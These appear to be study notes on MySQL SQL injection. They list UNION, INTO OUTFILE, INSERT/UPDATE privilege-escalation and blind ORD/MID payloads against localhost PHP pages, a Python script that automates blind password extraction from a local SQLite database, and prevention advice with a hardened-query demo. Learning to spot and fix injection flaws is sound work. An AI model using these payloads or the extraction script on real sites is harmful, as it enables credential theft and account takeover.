SQL injection is really about constructing SQL statements: only by using SQL flexibly can you build powerful injection strings. After finishing my study I wrote up these notes for later use, and I hope they help you see the principles behind SQL injection. The code in the notes comes from the web.
=== Basic Part ===
Queries within a single table (true/false tests against the user row):
http://127.0.0.1/injection/user.php?username=angel' and LENGTH(password)='6
http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,1)='m
UNION statement:
http://127.0.0.1/injection/show.php?id=1' union select 1,username,password from user/*
http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user/*
Exporting to a file (INTO OUTFILE):
http://127.0.0.1/injection/user.php?username=angel' into outfile 'c:/file.txt
http://127.0.0.1/injection/user.php?username=' or 1=1 into outfile 'c:/file.txt
http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user into outfile 'c:/user.txt
INSERT statement:
INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');
Set the homepage value to: http://4ngel.net', '3')#
The SQL statement becomes: INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://4ngel.net', '3')#', '1');
Everything after # is a comment, so the row is created with userlevel 3 instead of the hard-coded 1.
UPDATE statement: I like this one.
First understand this SQL:
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'
(The WHERE clause is cut off on the page; id='$id' is inferred from case 3 below.)
If the input is modified in one of the following ways, an injection is achieved.
1: Set the homepage value to
http://4ngel.net', userlevel='3
The SQL statement then becomes
UPDATE user SET password='mypass', homepage='http://4ngel.net', userlevel='3' WHERE id='$id'
userlevel is the user's privilege level.
2: Set the password value to
mypass)' WHERE username='admin'#
The SQL statement then becomes
UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'
3: Set the id value to
' OR username='admin'
The SQL statement then becomes
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'
=== Advanced Part ===
Common MySQL built-in functions:
DATABASE()
USER()
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()
VERSION()
SUBSTRING()
MID()
CHAR()
LOAD_FILE()
......
Applying the functions:
UPDATE article SET title=database() WHERE id=1
http://127.0.0.1/injection/show.php?id=-1 union select 1,database(),version()
SELECT * FROM user WHERE username=char(97,110,103,101,108)
# char(97,110,103,101,108) equals 'angel' (decimal ASCII codes), so the string can be supplied without quotes
http://127.0.0.1/injection/user.php?userid=1 and password=char(109,121,112,97,115,115)
http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)>char(100)
http://127.0.0.1/injection/user.php?userid=1 and ORD(MID(password,3,1))>111
Determining the number and types of columns:
http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1
http://127.0.0.1/injection/show.php?id=-1 union select char(97),char(97)
Guessing the table name:
http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1 from
Cross-table query to get the user name and password:
http://127.0.0.1/ymdown/show.php?id=10000 union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
Other:
# verify the first character of the password
http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ORD(MID(password,1,1))=49
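As an added example (not code from these notes or from the 4ngel article they draw on), here are the UNION dump and the ORD(MID(password,i,1))>N probe from this section turned into a complete extraction in Python against a constructed in-memory SQLite database. SQLite has no MID()/ORD(), so substr()/unicode() stand in; the table layout, the sample rows and the 3-column article query assumed behind show.php are all assumptions. It goes beyond the single `>111` probe above by running a binary search over the character value for every position.

```python
import sqlite3

# Constructed stand-in for the page's show.php and its `article`/`user` tables.
# SQLite is used so the example runs offline; it has no MID()/ORD(), so the
# equivalent substr()/unicode() are used in the probes. Table layout and the
# sample rows are assumptions, not the page's data.
SCHEMA = """
CREATE TABLE user(id INTEGER, username TEXT, password TEXT);
INSERT INTO user VALUES (1, 'admin', 'mypass');
INSERT INTO user VALUES (2, 'angel', 'Secret9');
CREATE TABLE article(id INTEGER, title TEXT, body TEXT);
INSERT INTO article VALUES (10, 'hello', 'first post');
"""


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def vulnerable_show(db, id_param):
    """show.php?id=... : the parameter is pasted into the SQL text unescaped."""
    sql = "SELECT id, title, body FROM article WHERE id=" + id_param
    return db.execute(sql).fetchall()


def union_dump(db):
    """UNION injection: id=-1 union select 1,username,password from user.
    The article query has 3 columns, so the injected SELECT must have 3 too."""
    rows = vulnerable_show(db, "-1 union select 1,username,password from user")
    return [(row[1], row[2]) for row in rows]


def oracle(db, condition):
    """Boolean oracle: id=10 and <condition> returns the article row iff the
    condition is true."""
    return len(vulnerable_show(db, "10 and " + condition)) == 1


def password_length(db, user_id, max_len=64):
    """The page's LENGTH(password)=N probe, tried for each candidate length."""
    for n in range(1, max_len + 1):
        if oracle(db, f"(select length(password) from user where id={user_id})={n}"):
            return n
    return None


def extract_password(db, user_id):
    """The page's ord(mid(password,i,1))>N probe, one binary search per position.
    Each character costs about 7 requests instead of up to 95 equality guesses."""
    length = password_length(db, user_id)
    if length is None:
        return None
    chars = []
    for i in range(1, length + 1):
        lo, hi = 32, 126  # assumed printable ASCII; widen the range for other data
        while lo < hi:
            mid = (lo + hi) // 2
            probe = (f"unicode(substr((select password from user where id={user_id}),"
                     f"{i},1))>{mid}")
            if oracle(db, probe):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


if __name__ == "__main__":
    db = make_db()
    print("union dump:", union_dump(db))
    for uid in (1, 2):
        print(f"user {uid}: length={password_length(db, uid)} "
              f"password={extract_password(db, uid)!r}")
```

The oracle is the only part that talks to the application; against a real target it would be an HTTP request and a check on whether the article body came back, and the rest of the extraction stays the same.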
=== Injection Prevention ===
Server side:
magic_quotes_gpc set to On
display_errors set to Off
(magic_quotes_gpc was deprecated in PHP 5.3 and removed in PHP 5.4, and the mysql_* functions were removed in PHP 7; on current PHP, bind parameters with prepared statements rather than relying on these settings.)
Coding side:
$keywords = addslashes($keywords);
$keywords = str_replace("_", "\_", $keywords);
$keywords = str_replace("%", "\%", $keywords);
(_ and % are LIKE wildcards, so they must be escaped as well when the value goes into a LIKE pattern.)
Numeric type:
Use intval() to convert the value
String type:
Wrap the parameter in single quotation marks in the SQL statement (and escape it)
The following code is used to prevent injection:
if (get_magic_quotes_gpc()) {
    // ....  (request data already has slashes added by magic_quotes_gpc)
} else {
    $keywords = mysql_real_escape_string($keywords);
    $keywords = str_replace("_", "\_", $keywords);
    $keywords = str_replace("%", "\%", $keywords);
}
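As an added example (not code from these notes), here is the vulnerable user.php query from the Basic Part next to a hardened version, in Python against a constructed in-memory SQLite database, together with the intval() rule for numeric parameters and the _ / % escaping for LIKE patterns. Parameter binding stands in for the page's addslashes / mysql_real_escape_string, and the table, rows and function names are assumptions. SQLite does not coerce '7' to 7 the way MySQL does and uses -- rather than # for comments, so the payloads are written in SQLite form.

```python
import re
import sqlite3

# Constructed stand-in for the page's user.php with a `user` table; SQLite is
# used so this runs offline. Rows and column names are assumptions.
SCHEMA = """
CREATE TABLE user(userid INTEGER, username TEXT, password TEXT, userlevel INTEGER);
INSERT INTO user VALUES (1, 'admin',   'mypass',  3);
INSERT INTO user VALUES (2, 'angel',   'angelpw', 1);
INSERT INTO user VALUES (3, 'angel_x', 'other',   1);
INSERT INTO user VALUES (4, 'angela',  'other',   1);
"""


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def user_page_vulnerable(db, username):
    """user.php?username=... : quoted in the SQL but never escaped."""
    sql = "SELECT username FROM user WHERE username='" + username + "'"
    return [row[0] for row in db.execute(sql)]


def user_page_safe(db, username):
    """Same query with a placeholder: the driver sends the value separately,
    so a quote in the input is data, not syntax. (The page's addslashes /
    mysql_real_escape_string approach escapes the quote instead.)"""
    sql = "SELECT username FROM user WHERE username=?"
    return [row[0] for row in db.execute(sql, (username,))]


def intval(s):
    """Emulates PHP intval() on a string: leading integer, otherwise 0."""
    m = re.match(r"\s*[+-]?\d+", s)
    return int(m.group()) if m else 0


def user_by_id_safe(db, id_param):
    """Numeric parameter: convert with intval() (the page's advice), then bind it."""
    sql = "SELECT username FROM user WHERE userid=?"
    return [row[0] for row in db.execute(sql, (intval(id_param),))]


def search_unescaped(db, keyword):
    """A placeholder stops injection, but _ and % in the keyword are still LIKE
    wildcards: 'angel_' matches 'angela' as well as 'angel_x'."""
    sql = "SELECT username FROM user WHERE username LIKE ?"
    return [row[0] for row in db.execute(sql, (keyword + "%",))]


def search_safe(db, keyword):
    """The page's str_replace of _ and % with backslash-escaped forms. MySQL treats
    backslash as the LIKE escape character by default; SQLite needs ESCAPE spelled out."""
    escaped = keyword.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT username FROM user WHERE username LIKE ? ESCAPE '\\'"
    return [row[0] for row in db.execute(sql, (escaped + "%",))]


if __name__ == "__main__":
    db = make_db()
    probe = "angel' and length(password)=7 and ''='"  # the page's LENGTH probe, SQLite form
    print(user_page_vulnerable(db, probe), user_page_safe(db, probe))
    print(user_page_vulnerable(db, "' or 1=1 -- "), user_page_safe(db, "' or 1=1 -- "))
    print(user_by_id_safe(db, "1 union select 1,password,1 from user"))
    print(search_unescaped(db, "angel_"), search_safe(db, "angel_"))
```

The LIKE case is the one that escaping quotes alone does not cover: a bound or escaped keyword of % still returns every row, which is why the page escapes _ and % separately from the quote handling.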
Useful functions:
stripslashes()
get_magic_quotes_gpc()
mysql_real_escape_string()
strip_tags()
array_map()
addslashes()
Reference articles:
http://www.4ngel.net/article/36.htm (SQL Injection with MySQL, Chinese)
http://www.phpe.net/mysql_manual/06-4.html (MySQL statement reference)